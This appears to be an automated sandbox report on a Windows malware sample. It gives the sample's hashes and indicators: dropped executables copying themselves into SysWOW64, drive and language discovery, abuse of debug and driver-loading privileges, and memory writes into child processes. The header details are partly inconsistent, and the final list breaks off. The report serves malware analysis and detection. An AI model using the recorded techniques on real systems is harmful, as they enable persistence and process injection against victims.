Analysis
max time kernel: 150s
max time network: 132s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28/09/2024, 04:21
Behavioral task: behavioral1
Sample: fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
Resource: win7-20240708-en
General
Target: fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
Size: 86KB
MD5: fb7e4180110ac2917b6a1f816438c7b9
SHA1: 392ae561ded6639279ceef98fe800538fc3eda76
SHA256: d7e299c1f844e0714d1e072f371c53929322fab99aa8fc9e73433f12994e1568
SHA512: e3b66b2e4a86fbb3cabe71c96dfa924c55b5d119c6cfcf0929f93bc2135dc401d35cbdc5772e9c6f6aef8a48cd4e0f2a9d311ddd3923c8cae47dcc5874fe453d
SSDEEP: 1536:vKec0Px8LhsjgyFL3raHLASSPh5I+C1ORnD0e/PTPBeXFpNDp:yi8m0yJPD1C1qD0+Jef
Malware Config
Signatures
Executes dropped EXE 64 IoCs
pid   Process
1676  BNO5lPp.exe
4540  nmbl12r.exe
924   nmbl12r.exe
4756  nmbl12r.exe
4952  nmbl12r.exe
2260  nmbl12r.exe
5084  nmbl12r.exe
2052  nmbl12r.exe
4480  nmbl12r.exe
2360  nmbl12r.exe
4960  nmbl12r.exe
1700  nmbl12r.exe
1544  nmbl12r.exe
3596  nmbl12r.exe
1804  nmbl12r.exe
4980  nmbl12r.exe
1672  nmbl12r.exe
1368  nmbl12r.exe
3524  nmbl12r.exe
4828  nmbl12r.exe
2232  nmbl12r.exe
3308  nmbl12r.exe
3164  nmbl12r.exe
4740  nmbl12r.exe
3056  nmbl12r.exe
3592  nmbl12r.exe
4164  nmbl12r.exe
1180  nmbl12r.exe
5080  nmbl12r.exe
4300  nmbl12r.exe
4940  nmbl12r.exe
3700  nmbl12r.exe
1960  nmbl12r.exe
864   nmbl12r.exe
4656  nmbl12r.exe
856   nmbl12r.exe
3184  nmbl12r.exe
2716  nmbl12r.exe
1800  nmbl12r.exe
4816  nmbl12r.exe
3340  nmbl12r.exe
1292  nmbl12r.exe
3856  nmbl12r.exe
3608  nmbl12r.exe
2464  nmbl12r.exe
1160  nmbl12r.exe
3744  nmbl12r.exe
5004  nmbl12r.exe
3740  nmbl12r.exe
4036  nmbl12r.exe
3764  nmbl12r.exe
4700  nmbl12r.exe
4208  nmbl12r.exe
1864  nmbl12r.exe
2132  nmbl12r.exe
4356  nmbl12r.exe
4812  nmbl12r.exe
3216  nmbl12r.exe
4608  nmbl12r.exe
4376  nmbl12r.exe
4392  nmbl12r.exe
4092  nmbl12r.exe
1136  nmbl12r.exe
4944  nmbl12r.exe
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description              ioc     Process
File opened (read-only)  \??\g:  nmbl12r.exe
File opened (read-only)  \??\x:  nmbl12r.exe
File opened (read-only)  \??\e:  nmbl12r.exe
File opened (read-only)  \??\s:  nmbl12r.exe
File opened (read-only)  \??\p:  nmbl12r.exe
File opened (read-only)  \??\u:  nmbl12r.exe
File opened (read-only)  \??\o:  nmbl12r.exe
File opened (read-only)  \??\v:  nmbl12r.exe
File opened (read-only)  \??\x:  nmbl12r.exe
File opened (read-only)  \??\o:  nmbl12r.exe
File opened (read-only)  \??\z:  nmbl12r.exe
File opened (read-only)  \??\u:  nmbl12r.exe
File opened (read-only)  \??\z:  nmbl12r.exe
File opened (read-only)  \??\n:  nmbl12r.exe
File opened (read-only)  \??\m:  nmbl12r.exe
File opened (read-only)  \??\x:  nmbl12r.exe
File opened (read-only)  \??\l:  nmbl12r.exe
File opened (read-only)  \??\g:  nmbl12r.exe
File opened (read-only)  \??\g:  nmbl12r.exe
File opened (read-only)  \??\o:  nmbl12r.exe
File opened (read-only)  \??\p:  nmbl12r.exe
File opened (read-only)  \??\z:  nmbl12r.exe
File opened (read-only)  \??\i:  nmbl12r.exe
File opened (read-only)  \??\y:  nmbl12r.exe
File opened (read-only)  \??\h:  nmbl12r.exe
File opened (read-only)  \??\u:  nmbl12r.exe
File opened (read-only)  \??\x:  nmbl12r.exe
File opened (read-only)  \??\g:  nmbl12r.exe
File opened (read-only)  \??\h:  nmbl12r.exe
File opened (read-only)  \??\h:  nmbl12r.exe
File opened (read-only)  \??\q:  nmbl12r.exe
File opened (read-only)  \??\o:  nmbl12r.exe
File opened (read-only)  \??\m:  nmbl12r.exe
File opened (read-only)  \??\t:  nmbl12r.exe
File opened (read-only)  \??\g:  nmbl12r.exe
File opened (read-only)  \??\e:  nmbl12r.exe
File opened (read-only)  \??\e:  nmbl12r.exe
File opened (read-only)  \??\p:  nmbl12r.exe
File opened (read-only)  \??\e:  nmbl12r.exe
File opened (read-only)  \??\j:  nmbl12r.exe
File opened (read-only)  \??\s:  nmbl12r.exe
File opened (read-only)  \??\l:  nmbl12r.exe
File opened (read-only)  \??\q:  nmbl12r.exe
File opened (read-only)  \??\r:  nmbl12r.exe
File opened (read-only)  \??\o:  nmbl12r.exe
File opened (read-only)  \??\j:  nmbl12r.exe
File opened (read-only)  \??\t:  nmbl12r.exe
File opened (read-only)  \??\y:  nmbl12r.exe
File opened (read-only)  \??\j:  nmbl12r.exe
File opened (read-only)  \??\m:  nmbl12r.exe
File opened (read-only)  \??\p:  nmbl12r.exe
File opened (read-only)  \??\r:  nmbl12r.exe
File opened (read-only)  \??\g:  nmbl12r.exe
File opened (read-only)  \??\t:  nmbl12r.exe
File opened (read-only)  \??\t:  nmbl12r.exe
File opened (read-only)  \??\j:  nmbl12r.exe
File opened (read-only)  \??\j:  nmbl12r.exe
File opened (read-only)  \??\g:  nmbl12r.exe
File opened (read-only)  \??\g:  nmbl12r.exe
File opened (read-only)  \??\r:  nmbl12r.exe
File opened (read-only)  \??\h:  nmbl12r.exe
File opened (read-only)  \??\t:  nmbl12r.exe
File opened (read-only)  \??\x:  nmbl12r.exe
File opened (read-only)  \??\e:  nmbl12r.exe
Drops file in System32 directory 64 IoCs
description   ioc                                        Process
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
File created  C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe  nmbl12r.exe
resource                                                                       yara_rule
behavioral2/memory/1676-5-0x0000000000400000-0x000000000044A000-memory.dmp     upx
behavioral2/files/0x000a00000002345f-4.dat                                     upx
behavioral2/memory/1676-19-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/4540-23-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/924-25-0x0000000000400000-0x000000000044A000-memory.dmp     upx
behavioral2/memory/1804-31-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/4952-30-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/3596-28-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/4756-27-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/2260-33-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/5084-35-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/2052-37-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/4480-39-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/2360-41-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/4960-43-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/1700-45-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/1544-47-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/3596-49-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/1804-51-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/4980-53-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/1672-55-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/1368-57-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/3524-59-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/4828-61-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/2232-63-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/3308-65-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/3164-67-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/4740-69-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/3056-71-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/3592-73-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/4164-75-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/1180-77-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/5080-79-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/4300-81-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/4940-83-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/3700-85-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/1960-87-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/864-89-0x0000000000400000-0x000000000044A000-memory.dmp     upx
behavioral2/memory/4656-91-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/856-93-0x0000000000400000-0x000000000044A000-memory.dmp     upx
behavioral2/memory/3184-95-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/2716-97-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/1800-99-0x0000000000400000-0x000000000044A000-memory.dmp    upx
behavioral2/memory/4816-101-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/3340-103-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/1292-105-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/3856-107-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/3608-109-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/2464-111-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/1160-113-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/3744-115-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/5004-117-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/3740-119-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/4036-121-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/3764-123-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/4700-125-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/4208-126-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/1864-127-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/2132-128-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/4356-129-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/4812-130-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/3216-131-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/4608-132-0x0000000000400000-0x000000000044A000-memory.dmp   upx
behavioral2/memory/4376-133-0x0000000000400000-0x000000000044A000-memory.dmp   upx
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 6 IoCs
pid    pid_target  Process            procid_target
29108  6636        Process not Found  5296
13240              Process not Found  4782
27620  18700       Process not Found  1029
18572  31988       Process not Found  12994
22164  17252       Process not Found  925
19564  23860       Process not Found  17616
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                            Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   nmbl12r.exe
(the same entry is repeated 64 times, once per nmbl12r.exe instance)
Modifies Internet Explorer settings
description       ioc                                                                                                                                        Process
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"          IEXPLORE.EXE
Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main                                    IEXPLORE.EXE
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"   IEXPLORE.EXE
Set value (str)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""   IEXPLORE.EXE
Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive                    IEXPLORE.EXE
Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery                IEXPLORE.EXE
Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main                                    IEXPLORE.EXE
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{1AB45CBC-7D51-11EF-818E-62A6B307388A} = "0"   IEXPLORE.EXE
Set value (str)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"                  IEXPLORE.EXE
Set value (data)  \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000   IEXPLORE.EXE
Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\VersionManager                          IEXPLORE.EXE
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31134045"   IEXPLORE.EXE
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"   IEXPLORE.EXE
Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\VersionManager                          IEXPLORE.EXE
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31134045"   IEXPLORE.EXE
Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch                      IEXPLORE.EXE
Set value (str)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"   IEXPLORE.EXE
Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\GPU                                     IEXPLORE.EXE
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4012183087"   IEXPLORE.EXE
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"   IEXPLORE.EXE
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4012183087"   IEXPLORE.EXE
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31134045"   IEXPLORE.EXE
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4013276992"   IEXPLORE.EXE
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31134045"   IEXPLORE.EXE
Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4013276992"   IEXPLORE.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid   Process
3068  fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
3068  fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description                   pid   Process
Token: SeDebugPrivilege       3068  fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
Token: SeLoadDriverPrivilege  1676  BNO5lPp.exe
Token: SeLoadDriverPrivilege  4540  nmbl12r.exe
Token: SeLoadDriverPrivilege  924   nmbl12r.exe
Token: SeLoadDriverPrivilege  4756  nmbl12r.exe
Token: SeLoadDriverPrivilege  4952  nmbl12r.exe
Token: SeLoadDriverPrivilege  2260  nmbl12r.exe
Token: SeLoadDriverPrivilege  5084  nmbl12r.exe
Token: SeLoadDriverPrivilege  2052  nmbl12r.exe
Token: SeLoadDriverPrivilege  4480  nmbl12r.exe
Token: SeLoadDriverPrivilege  2360  nmbl12r.exe
Token: SeLoadDriverPrivilege  4960  nmbl12r.exe
Token: SeLoadDriverPrivilege  1700  nmbl12r.exe
Token: SeLoadDriverPrivilege  1544  nmbl12r.exe
Token: SeLoadDriverPrivilege  3596  nmbl12r.exe
Token: SeLoadDriverPrivilege  1804  nmbl12r.exe
Token: SeLoadDriverPrivilege  4980  nmbl12r.exe
Token: SeLoadDriverPrivilege  1672  nmbl12r.exe
Token: SeLoadDriverPrivilege  1368  nmbl12r.exe
Token: SeLoadDriverPrivilege  3524  nmbl12r.exe
Token: SeLoadDriverPrivilege  4828  nmbl12r.exe
Token: SeLoadDriverPrivilege  2232  nmbl12r.exe
Token: SeLoadDriverPrivilege  3308  nmbl12r.exe
Token: SeLoadDriverPrivilege  3164  nmbl12r.exe
Token: SeLoadDriverPrivilege  4740  nmbl12r.exe
Token: SeLoadDriverPrivilege  3056  nmbl12r.exe
Token: SeLoadDriverPrivilege  3592  nmbl12r.exe
Token: SeLoadDriverPrivilege  4164  nmbl12r.exe
Token: SeLoadDriverPrivilege  1180  nmbl12r.exe
Token: SeLoadDriverPrivilege  5080  nmbl12r.exe
Token: SeLoadDriverPrivilege  4300  nmbl12r.exe
Token: SeLoadDriverPrivilege  4940  nmbl12r.exe
Token: SeLoadDriverPrivilege  3700  nmbl12r.exe
Token: SeLoadDriverPrivilege  1960  nmbl12r.exe
Token: SeLoadDriverPrivilege  864   nmbl12r.exe
Token: SeLoadDriverPrivilege  4656  nmbl12r.exe
Token: SeLoadDriverPrivilege  856   nmbl12r.exe
Token: SeLoadDriverPrivilege  3184  nmbl12r.exe
Token: SeLoadDriverPrivilege  2716  nmbl12r.exe
Token: SeLoadDriverPrivilege  1800  nmbl12r.exe
Token: SeLoadDriverPrivilege  4816  nmbl12r.exe
Token: SeLoadDriverPrivilege  3340  nmbl12r.exe
Token: SeLoadDriverPrivilege  1292  nmbl12r.exe
Token: SeLoadDriverPrivilege  3856  nmbl12r.exe
Token: SeLoadDriverPrivilege  3608  nmbl12r.exe
Token: SeLoadDriverPrivilege  2464  nmbl12r.exe
Token: SeLoadDriverPrivilege  1160  nmbl12r.exe
Token: SeLoadDriverPrivilege  3744  nmbl12r.exe
Token: SeLoadDriverPrivilege  5004  nmbl12r.exe
Token: SeLoadDriverPrivilege  3740  nmbl12r.exe
Token: SeLoadDriverPrivilege  4036  nmbl12r.exe
Token: SeLoadDriverPrivilege  3764  nmbl12r.exe
Token: SeLoadDriverPrivilege  4700  nmbl12r.exe
Token: SeLoadDriverPrivilege  4208  nmbl12r.exe
Token: SeLoadDriverPrivilege  1864  nmbl12r.exe
Token: SeLoadDriverPrivilege  2132  nmbl12r.exe
Token: SeLoadDriverPrivilege  4356  nmbl12r.exe
Token: SeLoadDriverPrivilege  4812  nmbl12r.exe
Token: SeLoadDriverPrivilege  3216  nmbl12r.exe
Token: SeLoadDriverPrivilege  4608  nmbl12r.exe
Token: SeLoadDriverPrivilege  4376  nmbl12r.exe
Token: SeLoadDriverPrivilege  4392  nmbl12r.exe
Token: SeLoadDriverPrivilege  4092  nmbl12r.exe
Token: SeLoadDriverPrivilege  1136  nmbl12r.exe
Suspicious use of FindShellTrayWindow 1 IoCs
pid   Process
1796  IEXPLORE.EXE
Suspicious use of SetWindowsHookEx 6 IoCs
pid   Process
1796  IEXPLORE.EXE
1796  IEXPLORE.EXE
216   IEXPLORE.EXE
216   IEXPLORE.EXE
216   IEXPLORE.EXE
216   IEXPLORE.EXE
Suspicious use of WriteProcessMemory 64 IoCs
description                        pid   Process                                              procid_target
PID 3068 wrote to memory of 4288   3068  fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe  84
PID 3068 wrote to memory of 4288   3068  fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe  84
PID 3068 wrote to memory of 4288   3068  fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe  84
PID 4288 wrote to memory of 1796   4288  iexplore.exe                                         85
PID 4288 wrote to memory of 1796   4288  iexplore.exe                                         85
PID 1796 wrote to memory of 216    1796  IEXPLORE.EXE                                         86
PID 1796 wrote to memory of 216    1796  IEXPLORE.EXE                                         86
PID 1796 wrote to memory of 216    1796  IEXPLORE.EXE                                         86
PID 3068 wrote to memory of 1676   3068  fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe  87
PID 3068 wrote to memory of 1676   3068  fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe  87
PID 3068 wrote to memory of 1676   3068  fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe  87
PID 1676 wrote to memory of 4540   1676  BNO5lPp.exe                                          90
PID 1676 wrote to memory of 4540   1676  BNO5lPp.exe                                          90
PID 1676 wrote to memory of 4540   1676  BNO5lPp.exe                                          90
PID 4540 wrote to memory of 924    4540  nmbl12r.exe                                          91
PID 4540 wrote to memory of 924    4540  nmbl12r.exe                                          91
PID 4540 wrote to memory of 924    4540  nmbl12r.exe                                          91
PID 924 wrote to memory of 4756    924   nmbl12r.exe                                          92
PID 924 wrote to memory of 4756    924   nmbl12r.exe                                          92
PID 924 wrote to memory of 4756    924   nmbl12r.exe                                          92
PID 4756 wrote to memory of 4952   4756  nmbl12r.exe                                          94
PID 4756 wrote to memory of 4952   4756  nmbl12r.exe                                          94
PID 4756 wrote to memory of 4952   4756  nmbl12r.exe                                          94
PID 4952 wrote to memory of 2260   4952  nmbl12r.exe                                          95
PID 4952 wrote to memory of 2260   4952  nmbl12r.exe                                          95
PID 4952 wrote to memory of 2260   4952  nmbl12r.exe                                          95
PID 2260 wrote to memory of 5084   2260  nmbl12r.exe                                          96
PID 2260 wrote to memory of 5084   2260  nmbl12r.exe                                          96
PID 2260 wrote to memory of 5084   2260  nmbl12r.exe                                          96
PID 5084 wrote to memory of 2052   5084  nmbl12r.exe                                          97
PID 5084 wrote to memory of 2052   5084  nmbl12r.exe                                          97
PID 5084 wrote to memory of 2052   5084  nmbl12r.exe                                          97
PID 2052 wrote to memory of 4480   2052  nmbl12r.exe                                          98
